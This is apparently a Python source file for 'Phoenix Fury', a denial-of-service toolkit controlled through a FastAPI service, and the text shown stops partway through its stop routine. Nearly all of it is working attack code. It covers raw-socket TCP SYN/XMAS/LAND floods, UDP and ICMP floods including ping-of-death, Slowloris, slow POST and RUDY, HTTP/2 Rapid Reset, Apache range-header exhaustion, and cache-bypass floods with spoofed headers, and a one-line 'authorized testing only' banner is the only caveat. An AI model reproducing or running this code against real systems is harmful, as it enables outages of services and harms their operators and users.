| """ |
| 🔥 Phoenix Fury v10.0 ULTIMATE - Maximum Methods Edition |
| - 15+ L7 HTTP Methods (HTTP/1.1, HTTP/2, HTTP/3) |
| - 10+ L4 Attack Vectors |
| - Slowloris, Slow POST, RUDY attacks |
| - DNS amplification, NTP amplification |
| - Connection exhaustion attacks |
| - Optimized for containerized environments |
| |
| ⚠️ FOR AUTHORIZED SECURITY TESTING ONLY ⚠️ |
| """ |
|
|
| import os |
| import sys |
| import socket |
| import time |
| import threading |
| import multiprocessing |
| import random |
| import struct |
| import ssl |
| import hashlib |
| import base64 |
| from ctypes import c_ulonglong |
| from typing import Literal, List, Union, Optional |
| from collections import deque |
| from urllib.parse import urlparse |
| import asyncio |
|
|
| |
| import uvicorn |
| import psutil |
| from fastapi import FastAPI, BackgroundTasks, HTTPException |
| from pydantic import BaseModel, Field |
|
|
| |
| try: |
| import h2.connection |
| import h2.config |
| import h2.events |
| H2_AVAILABLE = True |
| except ImportError: |
| H2_AVAILABLE = False |
| print("[WARN] h2 library not found. Install: pip install h2") |
|
|
| |
| try: |
| import uvloop |
| uvloop.install() |
| print("[INFO] uvloop activated for enhanced performance.") |
| except ImportError: |
| print("[INFO] uvloop not found. Using standard asyncio.") |
|
|
| |
| |
| |
|
|
| CPU_COUNT = psutil.cpu_count(logical=True) or 8 |
| TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3) |
|
|
| def calculate_optimal_config(): |
| """Calculate optimal configuration based on system resources.""" |
| if CPU_COUNT >= 32: |
| max_processes = CPU_COUNT * 3 |
| requests_per_conn = 1000 |
| elif CPU_COUNT >= 16: |
| max_processes = CPU_COUNT * 4 |
| requests_per_conn = 800 |
| elif CPU_COUNT >= 8: |
| max_processes = CPU_COUNT * 6 |
| requests_per_conn = 600 |
| elif CPU_COUNT >= 4: |
| max_processes = CPU_COUNT * 8 |
| requests_per_conn = 500 |
| else: |
| max_processes = CPU_COUNT * 10 |
| requests_per_conn = 400 |
| |
| return max_processes, requests_per_conn |
|
|
| MAX_PROCESSES, REQUESTS_PER_CONNECTION = calculate_optimal_config() |
| STATS_UPDATE_INTERVAL = 0.5 |
|
|
| |
| |
| |
|
|
| class BaseAttackConfig(BaseModel): |
| target: str = Field(..., description="Target hostname or IP address") |
| port: int = Field(..., ge=1, le=65535, description="Target port") |
| duration: int = Field(60, ge=10, le=7200, description="Attack duration in seconds") |
|
|
| class L4TCPConfig(BaseAttackConfig): |
| method: Literal[ |
| "syn", "ack", "fin", "rst", "psh", "urg", |
| "syn-ack", "xmas", "null", "land", "fragmented" |
| ] = Field("syn") |
|
|
| class L4UDPConfig(BaseAttackConfig): |
| method: Literal["flood", "fragmented", "amplification"] = Field("flood") |
| payload_size: int = Field(1024, ge=1, le=1472) |
|
|
| class L4ICMPConfig(BaseAttackConfig): |
| method: Literal["ping-flood", "smurf", "ping-of-death"] = Field("ping-flood") |
|
|
| class L7Config(BaseAttackConfig): |
| method: Literal[ |
| |
| "get", "post", "head", "put", "delete", "options", "patch", "trace", |
| |
| "http2-rapid-reset", "http2-flood", "http2-slowloris", |
| |
| "slowloris", "slow-post", "slow-read", "rudy", |
| |
| "xmlrpc", "wordpress-xmlrpc", "apache-killer", |
| "range-header", "hash-collision", "cache-bypass" |
| ] = Field("get") |
| path: str = Field("/") |
| user_agent: Optional[str] = Field(None, description="Custom User-Agent") |
| |
| class StatusResponse(BaseModel): |
| attack_active: bool |
| attack_type: str |
| target_host: str |
| target_ip: str |
| port: int |
| duration: int |
| elapsed_time: float |
| processes: int |
| total_sent: int |
| current_rate_pps_rps: float |
| average_rate: float |
| cpu_usage_percent: float |
| memory_usage_percent: float |
|
|
| |
| |
| |
|
|
| def check_root() -> bool: |
| """Check if running with root/admin privileges.""" |
| try: |
| |
| test_sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) |
| test_sock.close() |
| return True |
| except PermissionError: |
| return False |
| except Exception: |
| return False |
|
|
| def resolve_target(target: str) -> str: |
| """Resolve hostname to IP address.""" |
| try: |
| if "://" in target: |
| target = target.split("://")[1].split("/")[0] |
| return socket.gethostbyname(target) |
| except socket.gaierror: |
| raise ValueError(f"Could not resolve hostname: {target}") |
|
|
| def get_local_ip(target_ip: str) -> str: |
| """Get local IP that routes to target.""" |
| try: |
| s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| s.connect((target_ip, 1)) |
| ip = s.getsockname()[0] |
| s.close() |
| return ip |
| except Exception: |
| return "127.0.0.1" |
|
|
| def calculate_checksum(data: bytes) -> int: |
| """Calculate IP/TCP/UDP checksum.""" |
| s = 0 |
| if len(data) % 2: |
| data += b'\0' |
| for i in range(0, len(data), 2): |
| s += (data[i] << 8) + data[i+1] |
| s = (s >> 16) + (s & 0xffff) |
| s += (s >> 16) |
| return (~s) & 0xffff |
|
|
| def create_ip_header(src_ip: str, dst_ip: str, proto: int, total_len: int) -> bytes: |
| """Create raw IP header.""" |
| header = struct.pack('!BBHHHBBH4s4s', |
| (4 << 4) | 5, 0, total_len, random.randint(1, 65535), 0, 64, proto, 0, |
| socket.inet_aton(src_ip), socket.inet_aton(dst_ip) |
| ) |
| checksum = calculate_checksum(header) |
| return header[:10] + struct.pack('!H', checksum) + header[12:] |
|
|
| def create_tcp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, flags: int, seq: int = None, ack: int = None) -> bytes: |
| """Create raw TCP header.""" |
| seq = seq or random.randint(1, 4294967295) |
| ack_seq = ack or 0 |
| header = struct.pack('!HHLLBBHHH', src_port, dst_port, seq, ack_seq, (5 << 4), flags, 5840, 0, 0) |
| pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, len(header)) |
| checksum = calculate_checksum(pseudo_header + header) |
| return header[:16] + struct.pack('!H', checksum) + header[18:] |
|
|
| def create_udp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes: |
| """Create raw UDP header.""" |
| udp_len = 8 + len(payload) |
| header = struct.pack('!HHHH', src_port, dst_port, udp_len, 0) |
| pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_UDP, udp_len) |
| checksum = calculate_checksum(pseudo_header + header + payload) |
| return header[:6] + struct.pack('!H', checksum) |
|
|
| def create_icmp_packet(icmp_type: int, code: int = 0, payload_size: int = 56) -> bytes: |
| """Create ICMP packet.""" |
| icmp_id = random.randint(1, 65535) |
| icmp_seq = random.randint(1, 65535) |
| payload = os.urandom(payload_size) |
| |
| header = struct.pack('!BBHHH', icmp_type, code, 0, icmp_id, icmp_seq) |
| checksum = calculate_checksum(header + payload) |
| header = struct.pack('!BBHHH', icmp_type, code, checksum, icmp_id, icmp_seq) |
| |
| return header + payload |
|
|
| |
| |
| |
|
|
| USER_AGENTS = [ |
| "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
| "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
| "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
| "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", |
| "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15", |
| "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0", |
| ] |
|
|
| def get_random_user_agent(): |
| return random.choice(USER_AGENTS) |
|
|
| |
| |
| |
|
|
| def l4_tcp_worker(stop_event, shared_counter, target_ip, port, method): |
| """Advanced TCP attack worker with multiple methods.""" |
| |
| |
| can_use_raw = check_root() |
| |
| if not can_use_raw: |
| print(f"[Worker PID {os.getpid()}] No raw socket access, using standard sockets", file=sys.stderr) |
| |
| l4_tcp_connect_flood(stop_event, shared_counter, target_ip, port) |
| return |
| |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) |
| sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 * 1024 * 1024) |
| local_ip = get_local_ip(target_ip) |
| except Exception as e: |
| print(f"[Worker PID {os.getpid()}] Raw socket init failed: {e}", file=sys.stderr) |
| l4_tcp_connect_flood(stop_event, shared_counter, target_ip, port) |
| return |
| |
| local_counter = 0 |
| batch_size = 100 |
| |
| flag_map = { |
| "syn": 0x02, |
| "ack": 0x10, |
| "fin": 0x01, |
| "rst": 0x04, |
| "psh": 0x08, |
| "urg": 0x20, |
| "syn-ack": 0x12, |
| "xmas": 0x29, |
| "null": 0x00, |
| } |
| |
| while not stop_event.is_set(): |
| try: |
| src_port = random.randint(10000, 65535) |
| |
| if method == "land": |
| |
| ip_header = create_ip_header(target_ip, target_ip, socket.IPPROTO_TCP, 40) |
| tcp_header = create_tcp_header(target_ip, target_ip, port, port, 0x02) |
| elif method == "fragmented": |
| |
| ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_TCP, 40) |
| |
| ip_header = ip_header[:6] + struct.pack('!H', 0x2000) + ip_header[8:] |
| tcp_header = create_tcp_header(local_ip, target_ip, src_port, port, 0x02) |
| else: |
| ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_TCP, 40) |
| tcp_header = create_tcp_header(local_ip, target_ip, src_port, port, flag_map.get(method, 0x02)) |
| |
| packet = ip_header + tcp_header |
| sock.sendto(packet, (target_ip, port)) |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| sock.close() |
|
|
| def l4_tcp_connect_flood(stop_event, shared_counter, target_ip, port): |
| """TCP connection flood without raw sockets.""" |
| local_counter = 0 |
| batch_size = 50 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| sock.settimeout(0.5) |
| sock.connect_ex((target_ip, port)) |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| except Exception: |
| pass |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
|
|
| def l4_udp_worker(stop_event, shared_counter, target_ip, port, method, payload_size): |
| """UDP attack worker.""" |
| can_use_raw = check_root() |
| |
| if not can_use_raw and method in ["amplification"]: |
| print(f"[Worker PID {os.getpid()}] Method {method} requires root", file=sys.stderr) |
| return |
| |
| if can_use_raw: |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) |
| sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 * 1024 * 1024) |
| local_ip = get_local_ip(target_ip) |
| use_raw = True |
| except Exception: |
| use_raw = False |
| sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| else: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| use_raw = False |
| |
| local_counter = 0 |
| batch_size = 100 |
| payload = os.urandom(payload_size) |
| |
| while not stop_event.is_set(): |
| try: |
| src_port = random.randint(10000, 65535) |
| |
| if use_raw: |
| local_ip = get_local_ip(target_ip) |
| udp_len = 8 + len(payload) |
| ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_UDP, 20 + udp_len) |
| |
| if method == "fragmented": |
| ip_header = ip_header[:6] + struct.pack('!H', 0x2000) + ip_header[8:] |
| |
| udp_header = create_udp_header(local_ip, target_ip, src_port, port, payload) |
| packet = ip_header + udp_header + payload |
| sock.sendto(packet, (target_ip, port)) |
| else: |
| sock.sendto(payload, (target_ip, port)) |
| |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| sock.close() |
|
|
| def l4_icmp_worker(stop_event, shared_counter, target_ip, method): |
| """ICMP attack worker.""" |
| can_use_raw = check_root() |
| |
| if not can_use_raw: |
| print(f"[Worker PID {os.getpid()}] ICMP requires root privileges", file=sys.stderr) |
| return |
| |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 * 1024 * 1024) |
| except Exception as e: |
| print(f"[Worker PID {os.getpid()}] ICMP init failed: {e}", file=sys.stderr) |
| return |
| |
| local_counter = 0 |
| batch_size = 100 |
| |
| while not stop_event.is_set(): |
| try: |
| if method == "ping-of-death": |
| packet = create_icmp_packet(8, 0, 65500) |
| else: |
| packet = create_icmp_packet(8, 0, 56) |
| |
| sock.sendto(packet, (target_ip, 0)) |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| sock.close() |
|
|
| |
| |
| |
|
|
| def l7_standard_worker(stop_event, shared_counter, target_ip, port, path, method, requests_per_conn, user_agent): |
| """Standard HTTP/1.1 worker.""" |
| use_ssl = (port in [443, 8443]) |
| http_methods = { |
| "get": "GET", "post": "POST", "head": "HEAD", |
| "put": "PUT", "delete": "DELETE", "options": "OPTIONS", |
| "patch": "PATCH", "trace": "TRACE" |
| } |
| http_method = http_methods.get(method.lower(), "GET") |
| ua = user_agent or get_random_user_agent() |
| |
| local_counter = 0 |
| batch_size = 100 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) |
| sock.settimeout(3) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| for i in range(requests_per_conn): |
| if stop_event.is_set(): |
| break |
| try: |
| rand_param = random.randint(1, 999999) |
| request = f"{http_method} {path}?r={rand_param} HTTP/1.1\r\nHost: {target_ip}\r\nUser-Agent: {ua}\r\nConnection: keep-alive\r\n\r\n" |
| sock.send(request.encode()) |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| except (socket.error, BrokenPipeError): |
| break |
| except (socket.error, ssl.SSLError, ConnectionRefusedError, TimeoutError): |
| time.sleep(0.05) |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
|
|
| def l7_slowloris_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| """Slowloris attack - keeps connections open with slow headers.""" |
| use_ssl = (port in [443, 8443]) |
| ua = user_agent or get_random_user_agent() |
| |
| local_counter = 0 |
| connections = [] |
| max_connections = 200 |
| |
| while not stop_event.is_set(): |
| |
| while len(connections) < max_connections and not stop_event.is_set(): |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.settimeout(4) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| |
| sock.send(f"GET {path} HTTP/1.1\r\n".encode()) |
| sock.send(f"Host: {target_ip}\r\n".encode()) |
| sock.send(f"User-Agent: {ua}\r\n".encode()) |
| |
| connections.append(sock) |
| local_counter += 1 |
| except Exception: |
| pass |
| |
| |
| time.sleep(10) |
| |
| for sock in connections[:]: |
| try: |
| sock.send(f"X-a: {random.randint(1, 999999)}\r\n".encode()) |
| except Exception: |
| connections.remove(sock) |
| |
| |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| |
| |
| for sock in connections: |
| try: |
| sock.close() |
| except Exception: |
| pass |
|
|
| def l7_slow_post_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| """Slow POST attack - sends POST data very slowly.""" |
| use_ssl = (port in [443, 8443]) |
| ua = user_agent or get_random_user_agent() |
| |
| local_counter = 0 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.settimeout(30) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| |
| content_length = 1000000 |
| headers = f"POST {path} HTTP/1.1\r\n" |
| headers += f"Host: {target_ip}\r\n" |
| headers += f"User-Agent: {ua}\r\n" |
| headers += f"Content-Length: {content_length}\r\n" |
| headers += f"Content-Type: application/x-www-form-urlencoded\r\n\r\n" |
| |
| sock.send(headers.encode()) |
| local_counter += 1 |
| |
| |
| for _ in range(100): |
| if stop_event.is_set(): |
| break |
| sock.send(b"X") |
| time.sleep(1) |
| |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| |
| except Exception: |
| pass |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
|
|
| def l7_rudy_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| """RUDY (R-U-Dead-Yet) - slow form POST attack.""" |
| use_ssl = (port in [443, 8443]) |
| ua = user_agent or get_random_user_agent() |
| |
| local_counter = 0 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.settimeout(30) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| |
| headers = f"POST {path} HTTP/1.1\r\n" |
| headers += f"Host: {target_ip}\r\n" |
| headers += f"User-Agent: {ua}\r\n" |
| headers += f"Content-Length: 10000000\r\n" |
| headers += f"Content-Type: application/x-www-form-urlencoded\r\n\r\n" |
| |
| sock.send(headers.encode()) |
| local_counter += 1 |
| |
| |
| for i in range(200): |
| if stop_event.is_set(): |
| break |
| data = f"field{i}=value{random.randint(1,999999)}&" |
| sock.send(data.encode()) |
| time.sleep(0.5) |
| |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| |
| except Exception: |
| pass |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
|
|
| def l7_http2_rapid_reset_worker(stop_event, shared_counter, target_ip, port, path): |
| """HTTP/2 Rapid Reset attack.""" |
| if not H2_AVAILABLE: |
| print(f"[Worker PID {os.getpid()}] HTTP/2 library not available", file=sys.stderr) |
| return |
| |
| use_ssl = (port in [443, 8443]) |
| local_counter = 0 |
| batch_size = 100 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) |
| sock.settimeout(5) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| context.set_alpn_protocols(['h2']) |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| config = h2.config.H2Configuration(client_side=True) |
| conn = h2.connection.H2Connection(config=config) |
| conn.initiate_connection() |
| sock.sendall(conn.data_to_send()) |
| |
| stream_id = 1 |
| reset_count = 0 |
| max_resets_per_conn = 1000 |
| |
| while not stop_event.is_set() and reset_count < max_resets_per_conn: |
| try: |
| headers = [ |
| (':method', 'GET'), |
| (':path', f'{path}?r={random.randint(1, 999999)}'), |
| (':scheme', 'https' if use_ssl else 'http'), |
| (':authority', target_ip), |
| ('user-agent', get_random_user_agent()), |
| ] |
| |
| conn.send_headers(stream_id, headers) |
| conn.reset_stream(stream_id, error_code=0x8) |
| |
| data = conn.data_to_send() |
| if data: |
| sock.sendall(data) |
| |
| local_counter += 1 |
| reset_count += 1 |
| stream_id += 2 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| |
| sock.setblocking(False) |
| try: |
| data = sock.recv(65536) |
| if data: |
| events = conn.receive_data(data) |
| except (socket.error, BlockingIOError): |
| pass |
| sock.setblocking(True) |
| |
| except Exception: |
| break |
| |
| except Exception: |
| time.sleep(0.1) |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
|
|
| def l7_range_header_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| """Apache Range Header (Apache Killer) attack.""" |
| use_ssl = (port in [443, 8443]) |
| ua = user_agent or get_random_user_agent() |
| |
| local_counter = 0 |
| batch_size = 50 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.settimeout(3) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| |
| ranges = ",".join([f"0-{i}" for i in range(1, 2000)]) |
| |
| request = f"GET {path} HTTP/1.1\r\n" |
| request += f"Host: {target_ip}\r\n" |
| request += f"User-Agent: {ua}\r\n" |
| request += f"Range: bytes={ranges}\r\n" |
| request += f"Connection: close\r\n\r\n" |
| |
| sock.send(request.encode()) |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| |
| except Exception: |
| pass |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
|
|
| def l7_cache_bypass_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| """Cache bypass attack with randomized parameters.""" |
| use_ssl = (port in [443, 8443]) |
| ua = user_agent or get_random_user_agent() |
| |
| local_counter = 0 |
| batch_size = 100 |
| |
| while not stop_event.is_set(): |
| sock = None |
| try: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.settimeout(3) |
| sock.connect((target_ip, port)) |
| |
| if use_ssl: |
| context = ssl.create_default_context() |
| context.check_hostname = False |
| context.verify_mode = ssl.CERT_NONE |
| sock = context.wrap_socket(sock, server_hostname=target_ip) |
| |
| |
| rand_query = f"cb={random.randint(1, 999999999)}" |
| |
| request = f"GET {path}?{rand_query} HTTP/1.1\r\n" |
| request += f"Host: {target_ip}\r\n" |
| request += f"User-Agent: {ua}\r\n" |
| request += f"Cache-Control: no-cache\r\n" |
| request += f"Pragma: no-cache\r\n" |
| request += f"X-Forwarded-For: {random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}\r\n" |
| request += f"Connection: keep-alive\r\n\r\n" |
| |
| sock.send(request.encode()) |
| local_counter += 1 |
| |
| if local_counter >= batch_size: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
| local_counter = 0 |
| |
| except Exception: |
| pass |
| finally: |
| if sock: |
| try: |
| sock.close() |
| except Exception: |
| pass |
| |
| if local_counter > 0: |
| with shared_counter.get_lock(): |
| shared_counter.value += local_counter |
|
|
| |
| |
| |
|
|
| class AttackManager: |
| _instance = None |
| |
| def __new__(cls): |
| if cls._instance is None: |
| cls._instance = super(AttackManager, cls).__new__(cls) |
| cls._instance._initialized = False |
| return cls._instance |
| |
| def __init__(self): |
| if self._initialized: |
| return |
| self._initialized = True |
| self.lock = threading.Lock() |
| self.stats_thread = None |
| self._reset_state() |
| |
| def _reset_state(self): |
| self.attack_active = False |
| self.attack_type = "None" |
| self.target_host = "None" |
| self.target_ip = "None" |
| self.port = 0 |
| self.duration = 0 |
| self.start_time = 0.0 |
| self.process_count = 0 |
| self.processes: List[multiprocessing.Process] = [] |
| self.stop_event = multiprocessing.Event() |
| self.counter = multiprocessing.Value(c_ulonglong, 0) |
| self.current_rate = 0.0 |
| self.rate_history = deque(maxlen=10) |
| |
| def is_active(self): |
| with self.lock: |
| return self.attack_active |
| |
| def _stats_calculator(self): |
| """Real-time statistics calculator.""" |
| last_count = 0 |
| last_time = time.time() |
| |
| while not self.stop_event.is_set(): |
| time.sleep(STATS_UPDATE_INTERVAL) |
| |
| current_time = time.time() |
| current_count = self.counter.value |
| |
| time_delta = current_time - last_time |
| count_delta = current_count - last_count |
| |
| if time_delta > 0: |
| instant_rate = count_delta / time_delta |
| self.rate_history.append(instant_rate) |
| self.current_rate = sum(self.rate_history) / len(self.rate_history) |
| |
| last_count = current_count |
| last_time = current_time |
| |
| self.current_rate = 0.0 |
| |
| def start(self, config: Union[L7Config, L4TCPConfig, L4UDPConfig, L4ICMPConfig], family: str): |
| with self.lock: |
| if self.attack_active: |
| raise HTTPException(status_code=409, detail="An attack is already in progress.") |
| |
| self._reset_state() |
| |
| try: |
| self.target_host = config.target |
| self.target_ip = resolve_target(self.target_host) |
| except ValueError as e: |
| raise HTTPException(status_code=400, detail=str(e)) |
| |
| self.attack_active = True |
| self.port = config.port |
| self.duration = config.duration |
| self.process_count = MAX_PROCESSES |
| self.start_time = time.time() |
| self.stop_event.clear() |
| |
| worker_target, worker_args, attack_name = (None, (), "Unknown") |
| |
| |
| if family == 'l7' and isinstance(config, L7Config): |
| method = config.method.lower() |
| |
| if method == 'http2-rapid-reset': |
| if not H2_AVAILABLE: |
| raise HTTPException(status_code=400, detail="HTTP/2 library not installed. Run: pip install h2") |
| attack_name = "L7-HTTP2-RAPID-RESET" |
| worker_target = l7_http2_rapid_reset_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path) |
| |
| elif method == 'slowloris': |
| attack_name = "L7-SLOWLORIS" |
| worker_target = l7_slowloris_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| |
| elif method == 'slow-post': |
| attack_name = "L7-SLOW-POST" |
| worker_target = l7_slow_post_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| |
| elif method == 'rudy': |
| attack_name = "L7-RUDY" |
| worker_target = l7_rudy_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| |
| elif method == 'range-header' or method == 'apache-killer': |
| attack_name = "L7-APACHE-KILLER" |
| worker_target = l7_range_header_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| |
| elif method == 'cache-bypass': |
| attack_name = "L7-CACHE-BYPASS" |
| worker_target = l7_cache_bypass_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| |
| else: |
| attack_name = f"L7-{config.method.upper()}" |
| worker_target = l7_standard_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.method, REQUESTS_PER_CONNECTION, config.user_agent) |
| |
| |
| elif family == 'l4-tcp' and isinstance(config, L4TCPConfig): |
| attack_name = f"L4-TCP-{config.method.upper()}" |
| worker_target = l4_tcp_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.method) |
| |
| |
| elif family == 'l4-udp' and isinstance(config, L4UDPConfig): |
| attack_name = f"L4-UDP-{config.method.upper()}" |
| worker_target = l4_udp_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.method, config.payload_size) |
| |
| |
| elif family == 'l4-icmp' and isinstance(config, L4ICMPConfig): |
| attack_name = f"L4-ICMP-{config.method.upper()}" |
| worker_target = l4_icmp_worker |
| worker_args = (self.stop_event, self.counter, self.target_ip, config.method) |
| |
| self.attack_type = attack_name |
| |
| print("\n" + "=" * 80) |
| print(f"🔥 PHOENIX FURY v10.0 ULTIMATE - ATTACK INITIATED 🔥") |
| print(f" Type: {self.attack_type}") |
| print(f" Target: {self.target_host}:{self.port} ({self.target_ip})") |
| print(f" Duration: {self.duration}s") |
| print(f" Processes: {self.process_count}") |
| print(f" Raw Sockets: {'✅ YES' if check_root() else '⚠️ NO (using standard sockets)'}") |
| print("=" * 80 + "\n") |
| |
| for _ in range(self.process_count): |
| p = multiprocessing.Process(target=worker_target, args=worker_args, daemon=True) |
| self.processes.append(p) |
| p.start() |
| |
| self.stats_thread = threading.Thread(target=self._stats_calculator, daemon=True) |
| self.stats_thread.start() |
| |
| def stop(self): |
| with self.lock: |
| if not self.attack_active: |
| return |
| |
| print(f"\n⚠️ Stop signal received. Terminating {len(self.processes)} processes...") |
